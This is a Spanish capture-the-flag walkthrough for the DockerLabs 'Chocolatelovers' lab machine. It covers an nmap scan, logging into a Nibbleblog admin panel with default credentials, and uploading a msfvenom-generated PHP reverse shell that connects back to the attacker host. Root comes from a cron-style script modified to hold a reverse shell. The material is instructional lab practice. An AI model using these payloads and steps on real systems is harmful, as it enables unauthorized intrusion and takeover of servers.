Chocolatelovers - DockerLabs
Video de YouTube
| OS | Dificultad | Creator |
|---|---|---|
| Linux | Fácil | ElPinguinoDeMario |
Escaneo y Reconocimiento de puertos
Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.
nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2
-p-- Busqueda de puertos abiertos--open- Enumera los puertos abiertos-sS- Es un modo de escaneo rapido-sC-- Que use un conjunto de scripts de reconocimiento-sV- Que encuentre la version del servicio abirto--min-rate=5000- Hace que el reconocimiento aun vaya mas rapido mandando no menos de 5000 paquetes-n- No hace resolución DNS-Pn- No hace ping-vvv- Muestra en pantalla a medida que encuentra puertos (Verbose)
Vemos que esta abierto el puerto 80 HTTP
Web
Vamos a mirar en el codigo fuente.
Esto es posiblemente una ruta de la web vamos a ver que hay
Tenemos un enlaze que nos lleva al admin.php nos encontramos con un panel de acceso
Si ponemos admin admin accedemos
Si vamos a Plugins hemos de instalar el plugin My image, y ahi haremos lo siguiente:
Generaremos un payload con msfvenom para generar una reverse shell en un archivo php de la siguiente manera
msfvenom -p php/reverse_php LHOST=172.17.0.1 LPORT=443 -f raw > pwned.php
Este archivo lo subiremos dandole a browse y save changes.
Una vez hecho esto si investigamos un poco por la web vemos que en este repositorio estan los plugins http://172.17.0.2/nibbleblog/content/private/plugins/
El archivo malicioso se nos ha subido es el image.php.
Ahora vamos con net cat a quedarnos en escucha y veremos si nos manda una reverse shell.
Intrusión
Ya estamos dentro de la maquina Si hacemos sudo -l vemos que como el usuario chocolate podemos ejecutar el php vamos a buscar como escalar con PHP
Escalada de privilegios
Ya hemos escalado Si hacemos un ps -e -f Vemos un script que lo ejecuta root que no hay nada dentro vamos a intentar escalar a traves de ahí.
Modificamos el script introduciendo una reverse-shell.php de las webshells la ip la ponemos a nuestra maquina atacantes y el puerto por ejemplo ponemos el 1122 y si esperemos un momento…
YA SOMOS ROOT!